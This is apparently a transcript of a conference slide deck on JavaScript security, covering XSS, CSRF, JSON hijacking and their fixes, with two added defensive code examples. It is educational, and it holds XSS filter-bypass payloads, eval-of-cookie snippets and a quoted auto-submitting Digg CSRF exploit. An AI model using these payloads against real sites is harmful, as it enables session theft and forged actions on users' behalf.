JavaScript Security
JavaScript, as it is today, is an insecure language. We need to understand its shortcomings to improve the security of our applications and protect our users.

Published in: Technology
Transcript of "JavaScript Security"

  1. JavaScript Security, Jason Harwig
  2. "How dangerous could this silly little toy scripting language running inside a browser be?" Jeff Atwood, codinghorror.com, stackoverflow.com
  3. "JavaScript's biggest weakness is that it is not secure." Douglas Crockford
  4. "... nine out of 10 websites still have serious vulnerabilities ... (XSS) as the top vulnerability class" WhiteHat Security Website Security Statistic Report
  5. OWASP Top 10 2007
     1. XSS
     2. Injection Flaws
     3. File Exec
     4. Direct Object Reference
     5. CSRF
     6. Information Leakage
     7. Broken Auth
     8. Insecure Crypto
     9. Insecure Communications
     10. Failure to restrict URL access
  6. browser limitations
  7. javascript IO
     • Ajax
     • Image
     • iFrame
     • Source script
     • Bridge to Flash, Java applets
  8. Ajax:
       var xhr = new XMLHttpRequest();
       xhr.open(...)
  9. (diagram: browser to NIC Server / Google) * get or post
 10. Image:
       var image = new Image();
       image.src = url;
     * can detect connection success/failure
 11. (diagram: browser to NIC Server / Google) * get requests only | onload | onerror
 12. iFrame:
       f = document.createElement('iframe');
       f.src = url;
       document.body.appendChild(f);
     * only if same domain
 13. (diagram: browser to NIC Server / Google) * get requests only
 14. Source script:
       s = document.createElement('script');
       s.type = 'text/javascript';
       s.src = url;
       document.body.appendChild(s);
     * if JSON returned
 15. (diagram: browser to NIC Server / Google) * get requests only
 16. Form:
       f = document.createElement('form');
       f.method = 'post';
       ...
       f.submit();
 17. (diagram: browser to NIC Server / Google) * get or post
 18. white hat
     • Mashup / Aggregate content
     • SSO Solutions
     • Protect users / application integrity
 19. black hat
     • XSS
     • CSRF
     • JSON hijacking
     • Cookie session hijacking
     • Internal network scanning
     • History checking
 20. cross-site scripting
 21. (diagram: Browser, IFrame) same origin policy
 22. user input: escape it!
 23. XSS Flavors
     • Type 0 - DOM
     • Type 1 - Non-Persistent
     • Type 2 - Persistent
 24. Type 0
       var p = location.href.params;
       document.body.innerHTML = p;
 25. Type 1
       Search: <script>alert('xss');</script>
 26. Type 2
       Please enter username: <script>alert('xss');</script>
 27. Escaped output (JSTL):
       <c:out value="${var}" escapeXml="true"/>
     renders the stored value as plain text: Your Username: <script>alert('xss');</script>
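Added example (not from the slides): the entity escaping that `c:out escapeXml="true"` performs, next to the word-stripping filter that the following slides show being bypassed; the payload strings are the ones on the slides.

```javascript
// Added example, not from the slides: escaping (what escapeXml="true" does)
// beside a denylist filter of the kind the html-filtering slides defeat.
// Payload strings come from the slides; function names are this example's own.

// Encode the five characters that let data break out of an HTML text node
// or a quoted attribute value. The output is inert text in either context.
function escapeHtml(s) {
  var map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, function (c) { return map[c]; });
}

// The filter style the slides show being bypassed: delete banned substrings.
function stripDenylist(s) {
  var banned = ['javascript', 'innerHTML', 'onreadystatechange', '"'];
  return banned.reduce(function (out, w) { return out.split(w).join(''); }, s);
}

// Compare both approaches on one payload. A denylist only "catches" input
// that changes when filtered; a split word ('java\nscript', 'inne' + 'rHTML')
// passes through untouched, while escaping never has to recognise the payload.
function filterVsEscape(payload) {
  var filtered = stripDenylist(payload);
  return {
    filtered: filtered,
    filterCaught: filtered !== payload,
    escaped: escapeHtml(payload)
  };
}

// Type 1 case from the slides: reflect the search term. Escaped, it is text.
function renderSearch(term) {
  return 'Search: ' + escapeHtml(term);
}
```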
 28. html filtering
 29. samy is my hero (from http://fast.info/myspace/)
 30. (chart: Friend Requests, 0 to 7,000, over 12:34pm, 1:30am, 8:35am, 9:30am, 10:30am, 1:30pm)
 31. tag/attribute whitelist
       <div style="background:url('javascript:alert('xss')')">
 32. 'javascript' stripped
       <div style="background:url('java\nscript:alert('xss')')">
 33. " stripped
       String.fromCharCode(34);
 34. innerHTML stripped
       eval('document.body.inne' + 'rHTML');
 35. onreadystatechange stripped
       eval('xmlhttp.onread' + 'ystatechange = callback');
 36. to be continued..
 37. alternatives to escaping?
 38. Google Caja / ADsafe
 39. attack vectors to prevent?
 40. code evaluation
       eval('alert(document.cookie)');
       (new Function('alert(document.cookie)'))();
 41. code eval continued
       <iframe src="java[newline]script:alert('xss')"></iframe>
 42. polluting global objects
       try {
         throw EvilArrayFunction;
       } catch (Array) { }
 43. xss lessons
     • Escape XML
 44. cross site request forgery: the new kid
 45. (diagram: browser to NIC Server / Google)
 46. Digg.com
     • "digg" a story while logged in
     • Cookie authentication
     • known url, parameters
 47. digg exploit code (from http://4diggers.blogspot.com/)
       mf = window.frames["myframe"];
       html = '<form name="diggform" action="http://digg.com/diginfull" method="post">';
       html = html + '<input type="text" name="id" value="367034"/>';
       html = html + '<input type="text" name="orderchange" value="2"/>';
       html = html + '<input type="text" name="category" value="0"/>';
       html = html + '<input type="text" name="page" value="0"/>';
       html = html + '<input type="text" name="t" value="undefined"/>';
       html = html + '<input type="text" name="row" value="1"/>';
       html = html + '</form>';
       mf.document.body.innerHTML = html;
       mf.document.diggform.submit();
 48. Fixes?
     • Referral checking?
     • quick cookie expiration?
     • post?
 49. solved
       session.setAttribute("token", token);
       <input type="hidden" name="token" value="${token}"/>
 50. double submit cookie
 51. digg link
       <a href="javascript:dig([num],[id],[digCheck])">digg it</a>
 52. digg submit js
       new Ajax.Request("/diginfull", {
         "method": "post",
         "parameters": "id=" + itemd + "&row=" + row + "&digcheck=" + digcheck
                       + "&type=" + type + "&loc=" + pagetype
       });
 53. no diggcheck, no digg
 54. digg.com
     • Added random hash as post parameter
     • server verifies request
 55. myspace
     • used hash in post to add friends
     • XSS vulnerable so the hash could be retrieved
 56. HDIV
     • HTTP Data Integrity Validator
 57. rsnake joins twitter
 58. crossdomain.xml
       <?xml version="1.0" encoding="UTF-8"?>
       <cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
           xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
         <allow-access-from domain="*.twitter.com" />
         <site-control permitted-cross-domain-policies="master-only"/>
         <allow-http-request-headers-from domain="*.twitter.com" headers="*" secure="true"/>
       </cross-domain-policy>
 59. http://www.yourminis.com/search_minis.aspx?q=XSS
 60. stealing your gmail contacts
 61. google contacts url
       contacts?out=js&callback=google
 62. responseText
       google({
         Success: true,
         Errors: [],
         Body: {
           Contacts: [
             { id, email, etc. }
           ]
         }
       });
 63. google's solution?
     • responseXml
 64. lessons
     • Protect high value forms
     • CANNOT be stopped if site is vulnerable to XSS
 65. json hijacking
 66. Ajax request and response:
       new Ajax.Request('secretStuff', {
         onSuccess: doWork
       });
       // server responds with
       [
         { sensitive_info: '...' },
         { sensitive_info: '...' }
       ]
 67. So how do I do it?
     • Override Array
     • Source script
 68. demo
 69. solved
       /*-secure-
       [
         { sensitive_info: '...' },
         { sensitive_info: '...' }
       ]
       */
 70. "solved" continued
     • protect JSON services behind post
 71. lessons
     • Many experts recommend JSON services shouldn't serve sensitive data
     • use secure comment
     • responseXml as alternative
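Added example (not from the slides): the "secure comment" of slide 69 as a server-side wrapper and a matching client-side parser for the JSON hijacking slides (66 to 71); `wrapSecure`, `parseSecure` and the sample records are this example's own.

```javascript
// Added example, not from the slides: the secure-comment wrapper. Included
// via <script src> the body is one comment and runs nothing, so an
// overridden Array constructor never sees the data; only same-origin XHR
// code that strips the wrapper can read it. Sample records are constructed.
var PREFIX = '/*-secure-';
var SUFFIX = '*/';

// Server side: serialize and wrap. A literal "*/" inside a string value would
// close the comment early, so it is re-emitted as the JSON escape "*\/",
// which JSON.parse turns back into "*/".
function wrapSecure(data) {
  var json = JSON.stringify(data).replace(/\*\//g, '*\\/');
  return PREFIX + '\n' + json + '\n' + SUFFIX;
}

// Client side: accept only wrapped bodies. A bare array means the service is
// misconfigured and readable through script-tag inclusion, so fail loudly
// rather than silently using the data.
function parseSecure(responseText) {
  var text = String(responseText).trim();
  var wrapped = text.indexOf(PREFIX) === 0 &&
                text.lastIndexOf(SUFFIX) === text.length - SUFFIX.length;
  if (!wrapped) throw new Error('JSON service response is not wrapped in the secure comment');
  return JSON.parse(text.slice(PREFIX.length, text.length - SUFFIX.length));
}

// The onSuccess handler from the Ajax.Request slide, rewritten to go through
// parseSecure before touching the records.
function doWork(responseText) {
  return parseSecure(responseText).map(function (rec) { return rec.sensitive_info; });
}
```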
 72. Session hijacking
 73. demo
 74. internal network penetration
 75. history hijack
 76. demo
 77. resources
     • "Security Now! Podcast" twit.tv/sn
     • "Fortify" fortifysoftware.com/security-resources/
     • "WhiteHat Security" whitehatsec.com
     • "XSS Generator" ha.ckers.org/xss.html
     • "Jeremiah Grossman Blog" jeremiahgrossman.blogspot.com
     • "Samy is my Hero" fast.info/myspace
     • "Digg Hack" 4diggers.blogspot.com
     • "HDIV" hdiv.org
 78. twitter: jharwig, jason.harwig@nearinfinity.com, nearinfinity.com/blogs, careers@nearinfinity.com